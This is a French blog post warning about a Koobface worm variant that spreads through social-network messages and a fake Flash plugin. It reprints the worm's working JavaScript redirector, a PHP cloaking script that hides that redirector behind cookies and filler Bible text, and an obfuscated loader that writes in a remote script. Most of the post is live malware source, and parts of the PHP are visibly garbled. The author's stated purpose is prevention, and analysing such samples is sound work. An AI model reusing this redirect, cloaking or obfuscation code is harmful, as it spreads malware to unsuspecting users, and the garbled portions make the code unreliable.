Note: Je tiens a préciser pour ceux qui ne s’en sont pas rendus compte que les sources (php,js) diffusées dans cet article correspondent a la 56ème facette du dernier worm koobface,j’ai découvert celles ci en ayant été moi même la cible de ce virus de type worm, c’est ce qui explique la pauvreté de mes commentaires concernant les sources. Le but premier de cet article est la prévention.
Ces derniers temps j’ai pu identifier un trés gros malware de type worm qui se répands sur les réseaux sociaux , la partie non cachée du malware (javascript) que j’ai analysé utilise votre session pour répandre un lien malicieux a tous vos contact , les cibles visées par ce malware ne sont rien d’autre que facebook, tagged, friendster, myspace.com,msplinks.com,myyearbook,hi5,fubar,bebo,youtube.
Un énorme malware de type w0rm, pour l’instant pas détecté par les antivirus, qui va s’occupper d’envoyé un message contenant le lien malicieux a tous vos contact.
Premier hic , le lien malicieux est hébergé sur un site Americain officiel « 6th International Conference » voici l’url : 6icpmf.org.
Et il se répand dans votre boite de réception sur facebook de cette maniere :
Yoour naaked daances weere fillmed!
Une fois le lien cliqué , celui ci peut vous redirriger vers une fake page youtube qui vous proposera d’installer le fameux plugin flash player pour visualiser la video. Vous l’aurez compris ce plugin flash player d’adobe va cacher un executable malicieux qui aura pour but de s’emparer de votre ordinateur à distance tel un trojan.
Voici un bout de la source wormicide que j’ai pu identifier :
var abc1 = 'http://redir0705.com/go/';
var abc2 = 'http://redir0805.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
for (var i = 0; i < redirects.length; i ++) {
if ((s.indexOf(redirects[i][0]) != -1)) {
var redir=redirects[i][1] + location.search;
if ((location.search).length>0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
location.href = redir;
r = true;
break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;
Le web est mis en péril une fois de plus ! C’est pourquoi j’appel a la vigilance de tous les utilisateurs de ces réseaux sociaux: Ne cliquez pas sur des liens suspect, ou bien si vous faites, n’hésitez pas a recherché sur google l’origine du lien , si vous ne voyez aucun résultat confirmant vos craintes dans la recherche il sera sage de votre part de ne pas aller plus loin. Le plugin noscript demeurant impuissant face a cette attaque, seule la vigilance ,et la désactivation du javascript via le plugin firefox webdevelopper par exemple est grandement conseiller.
Note sur koobface:
Koobface n’est ni plus ni moin l’appelation que facebook a donné a ses malwares qui se répandent par l’intermédiaire de son site, il n’y a pas d’attaques typées pour koobface, pas de réelles caractéristiques(si sa n’est que la plupart utilisent des langages web), cela peut etre aussi bien un simple shell xss qu’un worm, ou bien encore un pishing avancé en javascript, les seul points communs a ces attaques reste le lien malicieux c’est pourquoi j’ai jugé important de le signaler ici.
Aprés une légère investigation sur google , on peut constater que le javascript est généré par php sans doute pour crypter l’attaque et rendre illisible certains fichiers.
edit:
Gnucitizen says: « No more free bugs » you say. I say that you are leading people to become the next generation of cyber menace. Perhaps you forgot that the information security community was built on and thrived because of a simple but fundamental principle: « knowledge must be free ».
// new variant by floppy
error_reporting(0);
ini_set('error_reporting', 0);
if (isset($_GET['test']) && $_GET['test']==1)
{
print "KROTEG";
exit();
}
$magicparam="ff";
$magicparam=substr(md5(date("H")), 0, 2);
$magicvalue=substr(md5(date("H")), 3, 2);
$randparam="a".substr(md5(rand(1,9999)),0,rand(3,10));
$randvalue=substr(md5(rand(1,9999)),0,rand(1,10));
//echo "$magicparam";
function miss ($key) {
$massiv=array(
'qwa',
'weqasd23v',
'ewrdfs34',
'retdfg45',
'tryfgh56',
'ytu67ghji',
'uiyhjk78',
'iuojkl89y',
'oipkl90',
'pol',
'azsqw',
'sweadxz',
'dfresxc',
'fdgrtcv',
'gfhtyvb',
'hgjyubn',
'jhkuinm',
'kjliomc',
'lkop',
'zasx',
'xzcsd',
'cxvdfk',
'vcbfg',
'bghvn',
'nbhjm',
'mnjk'
);
//$key=$_POST['domain_name'];
$missletters=0;
$missorder=0;
$missdouble=1;
$missneighbors=0;
$newone=count($massiv);
$errorslovo=$key;
$opo=array();
for($j=0;$j<$count; $i++) {
$str = $tmp[$i];
if (strlen($str)>3) {
$arr = miss($str);
$str = $arr[rand(0, count($arr)-1)];
//var_dump($str);
}
$new_str.= " ".$str;
}
if (strlen($t)>0)
{
$new_str=trim($new_str);
$new_str="<$t>$new_str";
}
return trim($new_str);
}
$vars = array("black","navy","blue","green","teal","lime","aqua","maroon","purple","olive","gray","silver","red","fuchsia","yellow","white");
$js_f = $vars[rand(0, count($vars) - 1)].$vars[rand(0, count($vars) - 1)];
$js_id = $vars[rand(0, count($vars) - 1)];
$title = "";
$t = array("video", "films", "movie", "youtube", "home entertainment","movies","television","tv","studios","home video","dvd","theater","now available","rentals","widescreen");
for ($i=0; $i<6; $i++) {
$title .= $t[rand(0, count($t) - 1)]." ";
}
$arr = array(
"And in his name shall the Gentiles trust. Then was brought unto him one possessed with
a devil, blind, and dumb: and he healed him, insomuch that the blind and dumb both spake and saw. ",
"And all the people were amazed, and said, Is not this the son of David?",
"But when the Pharisees heard it, they said, This fellow doth not cast out devils, but by
Beelzebub the prince of the devils. And Jesus knew their thoughts, and said unto them, Every kingdom
divided against itself is brought to desolation; and every city or house divided against itself shall not stand:
And if Satan cast out Satan, he is divided against himself; how shall then his kingdom stand?
And if I by Beelzebub cast out devils, by whom do your children cast them out? therefore they shall be your judges. ",
"Then one said unto him, Behold, thy mother and thy brethren stand without, desiring to
speak with thee. But he answered and said unto him that told him, Who is my mother? and who are
my brethren? And he stretched forth his hand toward his disciples, and said, Behold my mother and my brethren!",
"Then goeth he, and taketh with himself seven other spirits more wicked than himself, and they
enter in and dwell there: and the last state of that man is worse than the first. Even so shall it be also
unto this wicked generation. While he yet talked to the people, behold, his mother and his brethren stood
without, desiring to speak with him.",
"The queen of the south shall rise up in the judgment with this generation, and shall condemn it:
for she came from the uttermost parts of the earth to hear the wisdom of Solomon; and, behold, a greater
than Solomon is here. When the unclean spirit is gone out of a man, he walketh through dry places, seeking
rest, and findeth none. Then he saith, I will return into my house from whence I came out; and when he is
come, he findeth it empty, swept, and garnished.",
"Then certain of the scribes and of the Pharisees answered, saying, Master, we would see a sign
from thee. But he answered and said unto them, An evil and adulterous generation seeketh after a sign;
and there shall no sign be given to it, but the sign of the prophet Jonas: For as Jonas was three days and
three nights in the whale's belly; so shall the Son of man be three days and three nights in the heart of
the earth. The men of Nineveh shall rise in judgment with this generation, and shall condemn it: because
they repented at the preaching of Jonas; and, behold, a greater than Jonas is here.",
"A good man out of the good treasure of the heart bringeth forth good things: and an evil man
out of the evil treasure bringeth forth evil things. But I say unto you, That every idle word that men shall
speak, they shall give account thereof in the day of judgment. For by thy words thou shalt be justified,
and by thy words thou shalt be condemned.",
"And whosoever speaketh a word against the Son of man, it shall be forgiven him: but whosoever
speaketh against the Holy Ghost, it shall not be forgiven him, neither in this world, neither in the world to come.
Either make the tree good, and his fruit good; or else make the tree corrupt, and his fruit corrupt: for the tree
is known by his fruit. O generation of vipers, how can ye, being evil, speak good things? for out of the
abundance of the heart the mouth speaketh.",
"Or else how can one enter into a strong man's house, and spoil his goods, except he first bind
the strong man? and then he will spoil his house. He that is not with me is against me; and he that gathereth
not with me scattereth abroad. Wherefore I say unto you, All manner of sin and blasphemy shall be forgiven
unto men: but the blasphemy against the Holy Ghost shall not be forgiven unto men.",
"But when the Pharisees heard it, they said, This fellow doth not cast out devils, but by Beelzebub
the prince of the devils. And Jesus knew their thoughts, and said unto them, Every kingdom divided against
itself is brought to desolation; and every city or house divided against itself shall not stand:
And if Satan cast out Satan, he is divided against himself; how shall then his kingdom stand?
And if I by Beelzebub cast out devils, by whom do your children cast them out? therefore they shall be your judges.
But if I cast out devils by the Spirit of God, then the kingdom of God is come unto you.",
"And he stretched it forth; and it was restored whole, like as the other. Then the Pharisees went out,
and held a council against him, how they might destroy him. But when Jesus knew it, he withdrew himself from
thence: and great multitudes followed him, and he healed them all; And charged them that they should not make
him known: That it might be fulfilled which was spoken by Esaias the prophet, saying, Behold my servant,
whom I have chosen; my beloved, in whom my soul is well pleased: I will put my spirit upon him,
and he shall shew judgment to the Gentiles."
);
$cook=false;
$ref=false;
$reload=false;
if (isset($_COOKIE[$magicparam]) && $_COOKIE[$magicparam]==$magicvalue) $cook=true;
if (isset($_SERVER['HTTP_REFERER']))
{
$ref=true;
$fr="http://".$_SERVER['HTTP_HOST'];
if (strstr(strtolower($_SERVER['HTTP_REFERER']),strtolower($fr))) {
$reload=true; // this is javascript call
}
}
if ($reload)
{
if ($cook)
{
$host = $_SERVER['HTTP_HOST'];
// got cook. redir here
if (isset($_COOKIE[$magicparam]))
if ($_COOKIE[$magicparam]==$magicvalue)
{
$red="var abc1 = 'hxxp://y18032009.com/go/';".
"var abc2 = 'hxxp://redir1504.com/go/';".
"var ss = '' + location.search;".
"if ((location.search).length>0 && (ss.indexOf('ids=2') == -1)) abc = abc1; else abc = abc2;".
"var redirects = [".
"['facebook.com', abc+'fb.php'],".
"['tagged.com', abc+'tg.php'],".
"['friendster.com',abc+'fr.php'],".
"['myspace.com', abc+'ms.php'],".
"['msplinks.com', abc+'ms.php'],".
"['myyearbook.com',abc+'yb.php'],".
"['fubar.com', abc+'fu.php'],".
"['hi5.com', abc+'hi5.php'],".
"['bebo.com', abc+'be.php']".
"];".
"var s = '' + document.referrer, r = false;".
"for (var i = 0; i < redirects.length; i ++) {".
"if ((s.indexOf(redirects
* ) != -1)) {".
" var redir=redirects[1] + location.search; ".
" if ((location.search).length>0) redir=redir+'&domain=".$host."'; else redir=redir+'?domain=".$host."'; ".
" location.href = redir; ".
" r = true; ".
" break; ".
"}".
"}".
"if (!r) location.href = abc+'index.php'+ location.search;";
echo $red;
}
}
}
else
{
setcookie($magicparam, $magicvalue);
$rscript='';
print '
'.$title.'
';
$NUMTEXTS=5;
$scriptpos=rand(0,$NUMTEXTS-1);
for ($a=0;$a<$NUMTEXTS;$a++)
{
if ($a==$scriptpos) echo $rscript."\n";
echo miss2($arr[rand(0, count($arr)-1)])."\n";
}
echo '';
}
exit();
?>
Le html suivant la source du fichier php:
/*@cc_on @*/ /*@if (@_win32) var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = ""; for(var i=0;i <source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result);
Je tiens a remercier les sites qui ont tenus a supporté et rajouté des informations à mon article.
Blogs supporting this article:
French
http://mad.internetpol.fr/archives/45-Koobface-La-confiance-accordee-a-vos-relations-doit-cesser..html
Español:
http://blog.s21sec.com/2009/05/koobface-tirando-del-hilo.html
.p3Lo
Update:
source: sur google sbcglobal.net.